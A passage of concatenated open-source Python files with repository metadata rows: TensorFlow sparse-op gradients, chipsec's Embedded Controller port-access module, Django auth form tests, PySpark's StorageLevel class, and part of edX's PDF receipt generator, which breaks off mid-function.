cols = a_indices[:, 1]
# TODO(zongheng, ebrevdo): add conjugates in the right places when complex
# values are allowed.
# TODO(zongheng): these gather calls could potentially duplicate rows/cols in
# memory. If there is a need, we should look into implementing this more
# intelligently to avoid duplicating data.
parts_a = array_ops.gather(grad, rows if not adj_a else cols)
parts_b = array_ops.gather(b if not adj_b else array_ops.transpose(b),
cols if not adj_a else rows)
a_values_grad = math_ops.reduce_sum(parts_a * parts_b, reduction_indices=1)
# gradients w.r.t. (a_indices, a_values, a_shape, b)
return (None, a_values_grad, None, b_grad)
@ops.RegisterGradient("SparseDenseCwiseAdd")
def _SparseDenseCwiseAddGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseDenseCwiseAdd is currently not"
" implemented yet.")
def _SparseDenseCwiseMulOrDivGrad(op, grad, is_mul):
"""Common code for SparseDenseCwise{Mul,Div} gradients."""
x_indices = op.inputs[0]
x_shape = op.inputs[2]
y = op.inputs[3]
y_shape = math_ops.to_int64(array_ops.shape(y))
num_added_dims = array_ops.expand_dims(
array_ops.size(x_shape) - array_ops.size(y_shape), 0)
augmented_y_shape = array_ops.concat(
[array_ops.ones(num_added_dims, ops.dtypes.int64), y_shape], 0)
scaling = x_shape // augmented_y_shape
scaled_indices = x_indices // scaling
scaled_indices = array_ops.slice(scaled_indices,
array_ops.concat([[0], num_added_dims], 0),
[-1, -1])
dense_vals = array_ops.gather_nd(y, scaled_indices)
if is_mul:
dx = grad * dense_vals
dy_val = grad * op.inputs[1]
else:
dx = grad / dense_vals
dy_val = grad * (-op.inputs[1] / math_ops.square(dense_vals))
# indices can repeat after scaling, so we can't use sparse_to_dense().
dy = sparse_ops.sparse_add(
array_ops.zeros_like(y),
sparse_tensor.SparseTensor(scaled_indices, dy_val, y_shape))
# (sp_indices, sp_vals, sp_shape, dense)
return (None, dx, None, dy)
@ops.RegisterGradient("SparseDenseCwiseMul")
def _SparseDenseCwiseMulGrad(op, grad):
"""Gradients for SparseDenseCwiseMul."""
return _SparseDenseCwiseMulOrDivGrad(op, grad, True)
@ops.RegisterGradient("SparseDenseCwiseDiv")
def _SparseDenseCwiseDivGrad(op, grad):
"""Gradients for SparseDenseCwiseDiv."""
return _SparseDenseCwiseMulOrDivGrad(op, grad, False)
@ops.RegisterGradient("SparseSoftmax")
def _SparseSoftmaxGrad(op, grad):
"""Gradients for SparseSoftmax.
The calculation is the same as SoftmaxGrad:
grad_x = grad_softmax * softmax - sum(grad_softmax * softmax) * softmax
where we now only operate on the non-zero values present in the SparseTensors.
Args:
op: the SparseSoftmax op.
grad: the upstream gradient w.r.t. the non-zero SparseSoftmax output values.
Returns:
Gradients w.r.t. the input (sp_indices, sp_values, sp_shape).
"""
indices, shape = op.inputs[0], op.inputs[2]
out_vals = op.outputs[0]
sp_output = sparse_tensor.SparseTensor(indices, out_vals, shape)
sp_grad = sparse_tensor.SparseTensor(indices, grad, shape)
sp_product = sparse_tensor.SparseTensor(
indices, sp_output.values * sp_grad.values, shape)
# [..., B, 1], dense.
sum_reduced = -sparse_ops.sparse_reduce_sum(sp_product, [-1], keep_dims=True)
# sparse [..., B, C] + dense [..., B, 1] with broadcast; outputs sparse.
sp_sum = sparse_ops.sparse_dense_cwise_add(sp_grad, sum_reduced)
grad_x = sp_sum.values * sp_output.values
return [None, grad_x, None]
@ops.RegisterGradient("SparseSparseMaximum")
def _SparseSparseMaximumGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseSparseMaximum is currently not"
" implemented yet.")
@ops.RegisterGradient("SparseSparseMinimum")
def _SparseSparseMinimumGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseSparseMinimum is currently not"
" implemented yet.")
@ops.RegisterGradient("SparseFillEmptyRows")
def _SparseFillEmptyRowsGrad(op, unused_grad_output_indices, output_grad_values,
unused_grad_empty_row_indicator,
unused_grad_reverse_index_map):
"""Gradients for SparseFillEmptyRows."""
reverse_index_map = op.outputs[3]
# pylint: disable=protected-access
d_values, d_default_value = gen_sparse_ops._sparse_fill_empty_rows_grad(
reverse_index_map=reverse_index_map, grad_values=output_grad_values)
# d_indices, d_values, d_dense_shape, d_default_value.
return [None, d_values, None, d_default_value]
| apache-2.0 | -5,210,230,369,046,255,000 | 36.758741 | 91 | 0.687841 | false |
chipsecintel/chipsec | source/tool/chipsec/hal/ec.py | 3 | 6172 | #!/usr/local/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2016, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#[email protected]
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
#
# -------------------------------------------------------------------------------
"""
Access to Embedded Controller (EC)
Usage:
>>> write_command( command )
>>> write_data( data )
>>> read_data()
>>> read_memory( offset )
>>> write_memory( offset, data )
>>> read_memory_extended( word_offset )
>>> write_memory_extended( word_offset, data )
>>> read_range( start_offset, size )
>>> write_range( start_offset, buffer )
"""
from chipsec.logger import *
from chipsec.cfg.common import *
#
# Embedded Controller ACPI ports
#
IO_PORT_EC_DATA = 0x62
IO_PORT_EC_COMMAND = 0x66
IO_PORT_EC_STATUS = 0x66
IO_PORT_EC_INDEX = 0x380
IO_PORT_EC_INDEX_ADDRH = (IO_PORT_EC_INDEX + 0x1)
IO_PORT_EC_INDEX_ADDRL = (IO_PORT_EC_INDEX + 0x2)
IO_PORT_EC_INDEX_DATA = (IO_PORT_EC_INDEX + 0x3)
EC_STS_OBF = 0x01 # EC Output buffer full
EC_STS_IBF = 0x02 # EC Input buffer empty
#
# Embedded Controller ACPI commands
# These commands should be submitted to EC ACPI I/O ports
#
EC_COMMAND_ACPI_READ = 0x080 # Read EC ACPI memory
EC_COMMAND_ACPI_WRITE = 0x081 # Write EC ACPI memory
EC_COMMAND_ACPI_LOCK = 0x082 # Lock EC for burst use
EC_COMMAND_ACPI_UNLOCK = 0x083 # Unlock EC from burst use
EC_COMMAND_ACPI_QUERY = 0x084 # Query EC event
EC_COMMAND_ACPI_READ_EXT = 0x0F0 # Read EC ACPI extended memory
EC_COMMAND_ACPI_WRITE_EXT = 0x0F1 # Write EC ACPI extended memory
class EC:
def __init__( self, cs ):
self.cs = cs
#
# EC ACPI memory access
#
# Wait for EC input buffer empty
def _wait_ec_inbuf_empty( self ):
to = 1000
while (self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_IBF) and to: to = to - 1
return True
# Wait for EC output buffer full
def _wait_ec_outbuf_full( self ):
to = 1000
while not ( self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_OBF ) and to: to = to - 1
return True
def write_command( self, command ):
self._wait_ec_inbuf_empty()
return self.cs.io.write_port_byte( IO_PORT_EC_COMMAND, command )
def write_data( self, data ):
self._wait_ec_inbuf_empty()
return self.cs.io.write_port_byte( IO_PORT_EC_DATA, data )
def read_data( self ):
if not self._wait_ec_outbuf_full(): return None
return self.cs.io.read_port_byte( IO_PORT_EC_DATA )
def read_memory( self, offset ):
self.write_command( EC_COMMAND_ACPI_READ )
self.write_data( offset )
return self.read_data()
def write_memory( self, offset, data ):
self.write_command( EC_COMMAND_ACPI_WRITE )
self.write_data( offset )
return self.write_data( data )
def read_memory_extended( self, word_offset ):
self.write_command( EC_COMMAND_ACPI_READ )
self.write_data( 0x2 )
self.write_data( word_offset & 0xFF )
self.write_command( EC_COMMAND_ACPI_READ_EXT )
self.write_data( word_offset >> 8 )
return self.read_data()
def write_memory_extended( self, word_offset, data ):
self.write_command( EC_COMMAND_ACPI_WRITE )
self.write_data( 0x2 )
self.write_data( word_offset & 0xFF )
self.write_command( EC_COMMAND_ACPI_WRITE_EXT )
self.write_data( word_offset >> 8 )
return self.write_data( data )
def read_range( self, start_offset, size ):
buffer = [chr(0xFF)]*size
#self.write_command( EC_COMMAND_ACPI_READ )
for i in range (size):
#self.write_data( start_offset + i )
#buffer[i] = chr( self.read_data() )
if start_offset + i < 0x100:
buffer[i] = chr( self.read_memory( start_offset + i ) )
else:
buffer[i] = chr( self.read_memory_extended( start_offset + i ) )
if logger().VERBOSE:
logger().log( "[ec] read EC memory from offset %X size %X:" % (start_offset, size) )
print_buffer( buffer )
return buffer
def write_range( self, start_offset, buffer ):
size = len(buffer)
for i in range(size):
self.write_memory( start_offset + i, ord(buffer[i]) )
if logger().VERBOSE:
logger().log( "[ec] write EC memory to offset %X size %X:" % (start_offset, size) )
print_buffer( buffer )
return True
#
# EC Intex I/O access
#
def read_idx( self, offset ):
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRL, offset & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRH, (offset>>8) & 0xFF )
value = self.cs.io.read_port_byte( IO_PORT_EC_INDEX_DATA )
if logger().HAL: logger().log( "[ec] index read: offset 0x%02X > 0x%02X:" % (offset, value) )
return value
def write_idx( self, offset, value ):
if logger().HAL: logger().log( "[ec] index write: offset 0x%02X < 0x%02X:" % (offset, value) )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRL, offset & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRH, (offset>>8) & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_DATA, value & 0xFF )
return True
| gpl-2.0 | 2,814,664,325,244,914,700 | 33.674157 | 102 | 0.606124 | false |
pwhelan/djshouts | django/contrib/auth/tests/forms.py | 97 | 9436 | from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm, PasswordChangeForm, SetPasswordForm, UserChangeForm, PasswordResetForm
from django.db import connection
from django.test import TestCase
from django.utils import unittest
class UserCreationFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_user_already_exists(self):
data = {
'username': 'testclient',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[u'A user with that username already exists.'])
def test_invalid_data(self):
data = {
'username': 'jsmith!',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[u'This value may contain only letters, numbers and @/./+/-/_ characters.'])
def test_password_verification(self):
# The verification password is incorrect.
data = {
'username': 'jsmith',
'password1': 'test123',
'password2': 'test',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["password2"].errors,
[u"The two password fields didn't match."])
def test_both_passwords(self):
# One (or both) passwords weren't given
data = {'username': 'jsmith'}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors,
[u'This field is required.'])
self.assertEqual(form['password2'].errors,
[u'This field is required.'])
data['password2'] = 'test123'
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors,
[u'This field is required.'])
def test_success(self):
# The success case.
data = {
'username': '[email protected]',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
u = form.save()
self.assertEqual(repr(u), '<User: [email protected]>')
class AuthenticationFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_invalid_username(self):
# The user submits an invalid username.
data = {
'username': 'jsmith_does_not_exist',
'password': 'test123',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[u'Please enter a correct username and password. Note that both fields are case-sensitive.'])
def test_inactive_user(self):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[u'This account is inactive.'])
def test_success(self):
# The success case
data = {
'username': 'testclient',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
class SetPasswordFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[u"The two password fields didn't match."])
def test_success(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
class PasswordChangeFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_incorrect_password(self):
user = User.objects.get(username='testclient')
data = {
'old_password': 'test',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["old_password"].errors,
[u'Your old password was entered incorrectly. Please enter it again.'])
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[u"The two password fields didn't match."])
def test_success(self):
# The success case.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
def test_field_order(self):
# Regression test - check the order of fields:
user = User.objects.get(username='testclient')
self.assertEqual(PasswordChangeForm(user, {}).fields.keys(),
['old_password', 'new_password1', 'new_password2'])
class UserChangeFormTest(TestCase):
fixtures = ['authtestdata.json']
@unittest.skipIf(not connection.features.supports_joins, 'Requires JOIN support')
def test_username_validity(self):
user = User.objects.get(username='testclient')
data = {'username': 'not valid'}
form = UserChangeForm(data, instance=user)
self.assertFalse(form.is_valid())
self.assertEqual(form['username'].errors,
[u'This value may contain only letters, numbers and @/./+/-/_ characters.'])
def test_bug_14242(self):
# A regression test, introduce by adding an optimization for the
# UserChangeForm.
class MyUserForm(UserChangeForm):
def __init__(self, *args, **kwargs):
super(MyUserForm, self).__init__(*args, **kwargs)
self.fields['groups'].help_text = 'These groups give users different permissions'
class Meta(UserChangeForm.Meta):
fields = ('groups',)
# Just check we can create it
form = MyUserForm({})
class PasswordResetFormTest(TestCase):
fixtures = ['authtestdata.json']
def create_dummy_user(self):
"""creates a user and returns a tuple
(user_object, username, email)
"""
username = 'jsmith'
email = '[email protected]'
user = User.objects.create_user(username, email, 'test123')
return (user, username, email)
def test_invalid_email(self):
data = {'email':'not valid'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['email'].errors,
[u'Enter a valid e-mail address.'])
def test_nonexistant_email(self):
# Test nonexistant email address
data = {'email':'[email protected]'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors,
{'email': [u"That e-mail address doesn't have an associated user account. Are you sure you've registered?"]})
def test_cleaned_data(self):
# Regression test
(user, username, email) = self.create_dummy_user()
data = {'email': email}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['email'], email)
def test_bug_5605(self):
# bug #5605, preserve the case of the user name (before the @ in the
# email address) when creating a user.
user = User.objects.create_user('forms_test2', '[email protected]', 'test')
self.assertEqual(user.email, '[email protected]')
user = User.objects.create_user('forms_test3', 'tesT', 'test')
self.assertEqual(user.email, 'tesT')
def test_inactive_user(self):
#tests that inactive user cannot
#receive password reset email
(user, username, email) = self.create_dummy_user()
user.is_active = False
user.save()
form = PasswordResetForm({'email': email})
self.assertFalse(form.is_valid())
| bsd-3-clause | -7,808,169,824,084,575,000 | 33.564103 | 147 | 0.577999 | false |
ConeyLiu/spark | python/pyspark/storagelevel.py | 32 | 2640 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__all__ = ["StorageLevel"]
class StorageLevel(object):
"""
Flags for controlling the storage of an RDD. Each StorageLevel records whether to use memory,
whether to drop the RDD to disk if it falls out of memory, whether to keep the data in memory
in a JAVA-specific serialized format, and whether to replicate the RDD partitions on multiple
nodes. Also contains static constants for some commonly used storage levels, MEMORY_ONLY.
Since the data is always serialized on the Python side, all the constants use the serialized
formats.
"""
def __init__(self, useDisk, useMemory, useOffHeap, deserialized, replication=1):
self.useDisk = useDisk
self.useMemory = useMemory
self.useOffHeap = useOffHeap
self.deserialized = deserialized
self.replication = replication
def __repr__(self):
return "StorageLevel(%s, %s, %s, %s, %s)" % (
self.useDisk, self.useMemory, self.useOffHeap, self.deserialized, self.replication)
def __str__(self):
result = ""
result += "Disk " if self.useDisk else ""
result += "Memory " if self.useMemory else ""
result += "OffHeap " if self.useOffHeap else ""
result += "Deserialized " if self.deserialized else "Serialized "
result += "%sx Replicated" % self.replication
return result
StorageLevel.DISK_ONLY = StorageLevel(True, False, False, False)
StorageLevel.DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
StorageLevel.MEMORY_ONLY = StorageLevel(False, True, False, False)
StorageLevel.MEMORY_ONLY_2 = StorageLevel(False, True, False, False, 2)
StorageLevel.MEMORY_AND_DISK = StorageLevel(True, True, False, False)
StorageLevel.MEMORY_AND_DISK_2 = StorageLevel(True, True, False, False, 2)
StorageLevel.OFF_HEAP = StorageLevel(True, True, True, False, 1)
| apache-2.0 | -6,569,527,250,402,767,000 | 44.517241 | 97 | 0.714773 | false |
angelapper/edx-platform | lms/djangoapps/shoppingcart/pdf.py | 22 | 18645 | """
Template for PDF Receipt/Invoice Generation
"""
import logging
from django.conf import settings
from django.utils.translation import ugettext as _
from PIL import Image
from reportlab.lib import colors
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import mm
from reportlab.pdfgen.canvas import Canvas
from reportlab.platypus import Paragraph
from reportlab.platypus.tables import Table, TableStyle
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from xmodule.modulestore.django import ModuleI18nService
log = logging.getLogger("PDF Generation")
class NumberedCanvas(Canvas):
"""
Canvas child class with auto page-numbering.
"""
def __init__(self, *args, **kwargs):
"""
__init__
"""
Canvas.__init__(self, *args, **kwargs)
self._saved_page_states = []
def insert_page_break(self):
"""
Starts a new page.
"""
self._saved_page_states.append(dict(self.__dict__))
self._startPage()
def current_page_count(self):
"""
Returns the page count in the current pdf document.
"""
return len(self._saved_page_states) + 1
def save(self):
"""
Adds page numbering to each page (page x of y)
"""
num_pages = len(self._saved_page_states)
for state in self._saved_page_states:
self.__dict__.update(state)
if num_pages > 1:
self.draw_page_number(num_pages)
Canvas.showPage(self)
Canvas.save(self)
def draw_page_number(self, page_count):
"""
Draws the String "Page x of y" at the bottom right of the document.
"""
self.setFontSize(7)
self.drawRightString(
200 * mm,
12 * mm,
_("Page {page_number} of {page_count}").format(page_number=self._pageNumber, page_count=page_count)
)
class PDFInvoice(object):
"""
PDF Generation Class
"""
def __init__(self, items_data, item_id, date, is_invoice, total_cost, payment_received, balance):
"""
Accepts the following positional arguments
items_data - A list having the following items for each row.
item_description - String
quantity - Integer
list_price - float
discount - float
item_total - float
id - String
date - datetime
is_invoice - boolean - True (for invoice) or False (for Receipt)
total_cost - float
payment_received - float
balance - float
"""
# From settings
self.currency = settings.PAID_COURSE_REGISTRATION_CURRENCY[1]
self.logo_path = configuration_helpers.get_value("PDF_RECEIPT_LOGO_PATH", settings.PDF_RECEIPT_LOGO_PATH)
self.cobrand_logo_path = configuration_helpers.get_value(
"PDF_RECEIPT_COBRAND_LOGO_PATH", settings.PDF_RECEIPT_COBRAND_LOGO_PATH
)
self.tax_label = configuration_helpers.get_value("PDF_RECEIPT_TAX_ID_LABEL", settings.PDF_RECEIPT_TAX_ID_LABEL)
self.tax_id = configuration_helpers.get_value("PDF_RECEIPT_TAX_ID", settings.PDF_RECEIPT_TAX_ID)
self.footer_text = configuration_helpers.get_value("PDF_RECEIPT_FOOTER_TEXT", settings.PDF_RECEIPT_FOOTER_TEXT)
self.disclaimer_text = configuration_helpers.get_value(
"PDF_RECEIPT_DISCLAIMER_TEXT", settings.PDF_RECEIPT_DISCLAIMER_TEXT,
)
self.billing_address_text = configuration_helpers.get_value(
"PDF_RECEIPT_BILLING_ADDRESS", settings.PDF_RECEIPT_BILLING_ADDRESS
)
self.terms_conditions_text = configuration_helpers.get_value(
"PDF_RECEIPT_TERMS_AND_CONDITIONS", settings.PDF_RECEIPT_TERMS_AND_CONDITIONS
)
self.brand_logo_height = configuration_helpers.get_value(
"PDF_RECEIPT_LOGO_HEIGHT_MM", settings.PDF_RECEIPT_LOGO_HEIGHT_MM
) * mm
self.cobrand_logo_height = configuration_helpers.get_value(
"PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM", settings.PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM
) * mm
# From Context
self.items_data = items_data
self.item_id = item_id
self.date = ModuleI18nService().strftime(date, 'SHORT_DATE')
self.is_invoice = is_invoice
self.total_cost = '{currency}{amount:.2f}'.format(currency=self.currency, amount=total_cost)
self.payment_received = '{currency}{amount:.2f}'.format(currency=self.currency, amount=payment_received)
self.balance = '{currency}{amount:.2f}'.format(currency=self.currency, amount=balance)
# initialize the pdf variables
self.margin = 15 * mm
self.page_width = letter[0]
self.page_height = letter[1]
self.min_clearance = 3 * mm
self.second_page_available_height = ''
self.second_page_start_y_pos = ''
self.first_page_available_height = ''
self.pdf = None
def is_on_first_page(self):
"""
Returns True if it's the first page of the pdf, False otherwise.
"""
return self.pdf.current_page_count() == 1
def generate_pdf(self, file_buffer):
"""
Takes in a buffer and puts the generated pdf into that buffer.
"""
self.pdf = NumberedCanvas(file_buffer, pagesize=letter)
self.draw_border()
y_pos = self.draw_logos()
self.second_page_available_height = y_pos - self.margin - self.min_clearance
self.second_page_start_y_pos = y_pos
y_pos = self.draw_title(y_pos)
self.first_page_available_height = y_pos - self.margin - self.min_clearance
y_pos = self.draw_course_info(y_pos)
y_pos = self.draw_totals(y_pos)
self.draw_footer(y_pos)
self.pdf.insert_page_break()
self.pdf.save()
def draw_border(self):
"""
Draws a big border around the page leaving a margin of 15 mm on each side.
"""
self.pdf.setStrokeColorRGB(0.5, 0.5, 0.5)
self.pdf.setLineWidth(0.353 * mm)
self.pdf.rect(self.margin, self.margin,
self.page_width - (self.margin * 2), self.page_height - (self.margin * 2),
stroke=True, fill=False)
@staticmethod
def load_image(img_path):
"""
Loads an image given a path. An absolute path is assumed.
If the path points to an image file, it loads and returns the Image object, None otherwise.
"""
try:
img = Image.open(img_path)
except IOError, ex:
log.exception('Pdf unable to open the image file: %s', str(ex))
img = None
return img
def draw_logos(self):
"""
Draws logos.
"""
horizontal_padding_from_border = self.margin + 9 * mm
vertical_padding_from_border = 11 * mm
img_y_pos = self.page_height - (
self.margin + vertical_padding_from_border + max(self.cobrand_logo_height, self.brand_logo_height)
)
# Left-Aligned cobrand logo
if self.cobrand_logo_path:
cobrand_img = self.load_image(self.cobrand_logo_path)
if cobrand_img:
img_width = float(cobrand_img.size[0]) / (float(cobrand_img.size[1]) / self.cobrand_logo_height)
self.pdf.drawImage(cobrand_img.filename, horizontal_padding_from_border, img_y_pos, img_width,
self.cobrand_logo_height, mask='auto')
# Right aligned brand logo
if self.logo_path:
logo_img = self.load_image(self.logo_path)
if logo_img:
img_width = float(logo_img.size[0]) / (float(logo_img.size[1]) / self.brand_logo_height)
self.pdf.drawImage(
logo_img.filename,
self.page_width - (horizontal_padding_from_border + img_width),
img_y_pos,
img_width,
self.brand_logo_height,
mask='auto'
)
return img_y_pos - self.min_clearance
def draw_title(self, y_pos):
"""
Draws the title, order/receipt ID and the date.
"""
if self.is_invoice:
title = (_('Invoice'))
id_label = (_('Invoice'))
else:
title = (_('Receipt'))
id_label = (_('Order'))
# Draw Title "RECEIPT" OR "INVOICE"
vertical_padding = 5 * mm
horizontal_padding_from_border = self.margin + 9 * mm
font_size = 21
self.pdf.setFontSize(font_size)
self.pdf.drawString(horizontal_padding_from_border, y_pos - vertical_padding - font_size / 2, title)
y_pos = y_pos - vertical_padding - font_size / 2 - self.min_clearance
horizontal_padding_from_border = self.margin + 11 * mm
font_size = 12
self.pdf.setFontSize(font_size)
y_pos = y_pos - font_size / 2 - vertical_padding
# Draw Order/Invoice No.
self.pdf.drawString(horizontal_padding_from_border, y_pos,
_(u'{id_label} # {item_id}').format(id_label=id_label, item_id=self.item_id))
y_pos = y_pos - font_size / 2 - vertical_padding
# Draw Date
self.pdf.drawString(
horizontal_padding_from_border, y_pos, _(u'Date: {date}').format(date=self.date)
)
return y_pos - self.min_clearance
def draw_course_info(self, y_pos):
"""
Draws the main table containing the data items.
"""
course_items_data = [
['', (_('Description')), (_('Quantity')), (_('List Price\nper item')), (_('Discount\nper item')),
(_('Amount')), '']
]
for row_item in self.items_data:
course_items_data.append([
'',
Paragraph(row_item['item_description'], getSampleStyleSheet()['Normal']),
row_item['quantity'],
'{currency}{list_price:.2f}'.format(list_price=row_item['list_price'], currency=self.currency),
'{currency}{discount:.2f}'.format(discount=row_item['discount'], currency=self.currency),
'{currency}{item_total:.2f}'.format(item_total=row_item['item_total'], currency=self.currency),
''
])
padding_width = 7 * mm
desc_col_width = 60 * mm
qty_col_width = 26 * mm
list_price_col_width = 21 * mm
discount_col_width = 21 * mm
amount_col_width = 40 * mm
course_items_table = Table(
course_items_data,
[
padding_width,
desc_col_width,
qty_col_width,
list_price_col_width,
discount_col_width,
amount_col_width,
padding_width
],
splitByRow=1,
repeatRows=1
)
course_items_table.setStyle(TableStyle([
#List Price, Discount, Amount data items
('ALIGN', (3, 1), (5, -1), 'RIGHT'),
# Amount header
('ALIGN', (5, 0), (5, 0), 'RIGHT'),
# Amount column (header + data items)
('RIGHTPADDING', (5, 0), (5, -1), 7 * mm),
# Quantity, List Price, Discount header
('ALIGN', (2, 0), (4, 0), 'CENTER'),
# Description header
('ALIGN', (1, 0), (1, -1), 'LEFT'),
# Quantity data items
('ALIGN', (2, 1), (2, -1), 'CENTER'),
# Lines below the header and at the end of the table.
('LINEBELOW', (0, 0), (-1, 0), 1.00, '#cccccc'),
('LINEBELOW', (0, -1), (-1, -1), 1.00, '#cccccc'),
# Innergrid around the data rows.
('INNERGRID', (1, 1), (-2, -1), 0.50, '#cccccc'),
# Entire table
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TOPPADDING', (0, 0), (-1, -1), 2 * mm),
('BOTTOMPADDING', (0, 0), (-1, -1), 2 * mm),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
]))
rendered_width, rendered_height = course_items_table.wrap(0, 0)
table_left_padding = (self.page_width - rendered_width) / 2
split_tables = course_items_table.split(0, self.first_page_available_height)
if len(split_tables) > 1:
# The entire Table won't fit in the available space and requires splitting.
# Draw the part that can fit, start a new page
# and repeat the process with the rest of the table.
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, y_pos - rendered_height)
self.prepare_new_page()
split_tables = split_tables[1].split(0, self.second_page_available_height)
while len(split_tables) > 1:
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, self.second_page_start_y_pos - rendered_height)
self.prepare_new_page()
split_tables = split_tables[1].split(0, self.second_page_available_height)
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, self.second_page_start_y_pos - rendered_height)
else:
# Table will fit without the need for splitting.
course_items_table.drawOn(self.pdf, table_left_padding, y_pos - rendered_height)
if not self.is_on_first_page():
y_pos = self.second_page_start_y_pos
return y_pos - rendered_height - self.min_clearance
def prepare_new_page(self):
"""
Inserts a new page and includes the border and the logos.
"""
self.pdf.insert_page_break()
self.draw_border()
y_pos = self.draw_logos()
return y_pos
def draw_totals(self, y_pos):
"""
Draws the boxes containing the totals and the tax id.
"""
totals_data = [
[(_('Total')), self.total_cost],
[(_('Payment Received')), self.payment_received],
[(_('Balance')), self.balance]
]
if self.is_invoice:
# only print TaxID if we are generating an Invoice
totals_data.append(
['', '{tax_label}: {tax_id}'.format(tax_label=self.tax_label, tax_id=self.tax_id)]
)
heights = 8 * mm
totals_table = Table(totals_data, 40 * mm, heights)
styles = [
# Styling for the totals table.
('ALIGN', (0, 0), (-1, -1), 'RIGHT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
# Styling for the Amounts cells
# NOTE: since we are not printing the TaxID for Credit Card
# based receipts, we need to change the cell range for
# these formatting rules
('RIGHTPADDING', (-1, 0), (-1, 2), 7 * mm),
('GRID', (-1, 0), (-1, 2), 3.0, colors.white),
('BACKGROUND', (-1, 0), (-1, 2), '#EEEEEE'),
]
totals_table.setStyle(TableStyle(styles))
__, rendered_height = totals_table.wrap(0, 0)
left_padding = 97 * mm
if y_pos - (self.margin + self.min_clearance) <= rendered_height:
# if space left on page is smaller than the rendered height, render the table on the next page.
self.prepare_new_page()
